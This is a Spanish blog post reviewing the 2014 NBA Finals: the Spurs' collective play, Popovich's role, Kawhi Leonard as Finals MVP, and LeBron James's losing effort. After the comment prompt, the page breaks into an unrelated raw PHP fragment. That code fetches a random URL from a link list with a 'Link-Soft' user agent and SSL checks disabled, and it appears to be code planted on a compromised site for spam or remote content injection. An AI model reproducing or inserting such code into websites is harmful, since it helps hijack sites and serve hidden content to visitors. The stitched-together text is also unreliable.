Resumen de las finales: Spurs 4 – Heat 1

20 de June de 2014 por TheDeerHunter

“So I think, just in general, for the group to have the fortitude that they showed to get back to this spot, I think speaks volumes about how they’re constituted and what kind of fiber they have.”
Gregg Popovich

Cuesta trabajo digerir lo que hemos vivido estos días. Aún estamos deslumbrados tras presenciar una de las actuaciones más perfectas que hayamos visto en una final de la NBA. Toda una obra maestra. La sublimación del colectivo, que al fin y al cabo es la esencia más pura de este deporte. Los grandes dominadores de la competición los últimos años, liderados por el mejor jugador del momento, han sido brutalmente destrozados por una escuadra y una filosofía de otra época. Cuántas veces les habíamos enterrado en el pasado.

La historia es particularmente hermosa y alentadora. Decía Michael Jordan en una recordada campaña publicitaria algo parecido a que había sido el mejor por la cantidad de veces que había fracasado y se había levantado. Esa idea se aplica a la perfección a estos Spurs y especialmente en este caso tras el duro varapalo de las anteriores finales aunque cabe preguntarse si los tejanos hubieran alcanzado este nivel de no haber caído el año pasado. Hace falta estar hecho de una pasta especial, como decía Popovich, para sobreponerse al inevitable paso del tiempo y a esa sensación de última oportunidad perdida, para erigirse como los mejores de manera tan apabullante. Pero lo más impresionante de todo son las formas. Lejos de renunciar a si mismos tras la última decepción, profundizaron y depuraron su ideario. El paradigma del talento, la inteligencia y la excelencia puestos al servicio del colectivo frente al modelo “Big Three” que se había impuesto. Los descomunales músculos de LeBron y Wade nos habían hecho olvidad un poco que esto sigue siendo un juego de listos y de “jugones”. La estética, el estilo, no ha sido un simple matiz sinó el principal medio para alcanzar el fin. Es curioso el contraste frente a los Spurs primigenios, abanderados del “ganar de cualquier manera”. 

“It’s amazing to be a part of this”
Tim Duncan.

En unos playoffs donde los grandes gallos han encontrado serias dificultades para involucrar a sus secundarios los Spurs han puesto en liza a 9 o 10 hombres activos. En el sistema de pases de este equipo participan obligatoriamente todos, con o sin balón, y desde el mejor jugador del equipo hasta el último hombre de la rotación deben estar preparados en todo momento para ejecutar. Este sistema genera motivación y diluye desgaste y esfuerzos. No puedo dejar de considerar que al final los Kings de Adelman y Webber ganaron porque estos Spurs son herencia directa. Quién iba a pensar que sería Greg Popovich el alumno aventajado de todo aquello. Además se debe destacar la humildad y naturalidad con la que animales mitológicos como Tim Duncan, Manu Ginobili y Tony Parker han sido capaces de ceder el protagonismo. De otra manera jamás habría funcionado el sistema y no es lo más frecuente en esta liga. A ver si cunde el ejemplo en todos los sentidos.

Sobre los Heat, no debemos caer en el error de menospreciarles porque hay quien pone en duda ahora sus logros. Es innegable que la diferencia ha sido muy grande pero es mérito exclusivo del listón que han colocado los campeones, uno de los más altos que hayamos visto. No debemos olvidar la sensación de inaccesibles que hasta hace unos días nos habían transmitido los de Florida, nin la pegada que mostraron los dos primeros partidos de la serie, e incluso en algunas fases del tercero. Está claro que por la concentración de talento en los Heat no era fácil ser tricampeones sin un alto rendimiento de su Big Three pero también es cierto que si los Spurs no hubieran desplegado el 100% de su potencial sólo LeBron James y algunos destellos del resto podía haber sido suficiente para discutir el anillo. Lo de King James ha sido, a pesar de la derrota, nuevamente asombroso. No debiera haber sorprendido que le hubieran elegido MVP de las finales a pesar de la derrota. Hubiera sido el segundo caso en la historia tras el de Jerry West en 1969. El mejor jugador de largo de esta postemporada, aunque no ha sido suficiente. Para la memoria quedará su imagen cojo del primer partido, así como lo del aire acondicionado para la leyenda negra de los imprevistos en San Antonio.

PREMIOS

MVP: El año pasado se nos reprochó no haber mencionado a Greg Popovich en los premios. Este año no cometeremos el mismo error pues para muchos es el hombre más importante de los campeones. Nunca habíamos visto unos ganadores de la regular en el que ninguno de sus jugadores hubieran alcanzado los 30 minutos por partido, ni un equilibrio tan perfecto entre estética y competitividad, entre ataque y defensa. No habíamos presenciado jamás una explotación similar de una plantilla que no parece la más potente ni en nadie una evolución tan fabulosa en su manera de ver las cosas. Nunca vimos una dinastía capaz de reinventarse y ganar campeonatos durante 15 años. Este MVP se hace extensivo a todos y cada uno de los miembros del equipo campeón, auténticas prolongaciones del técnico.

Sorpresa: Kawhi Leonard iba de cabeza a personificar la decepción de las finales tras el segundo partido porque LeBron James se lo estaba comiendo. A sus 23 años hubiera sido extraordinario que hubiera logrado limitar la producción del mejor jugador del mundo pero además de eso asumió la mayor responsabilidad ofensiva de su carrera, en un momento como ese. Antológico. Su irrupción supuso el principio del fin de los Heat. Justo MVP de las finales. Uno de los pocos que lo han logrado antes de ser all-stars.

Decepción: Dwyane Wade. Sabemos desde hace tiempo que su físico no le acompaña pero esto vas más allá…

Esfuerzo en vano: LeBron James se añade a la lista de los más grandes mitos caídos. 38 minutos por partido, 28.2 puntos por partido (57% en tiro y 52% en triples), 7.8 rebotes, 4 asistencias y 2 robos. En este caso es literal lo de “hacer lo humanamente posible”, pero ha estado demasiado solo en todos los aspectos.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>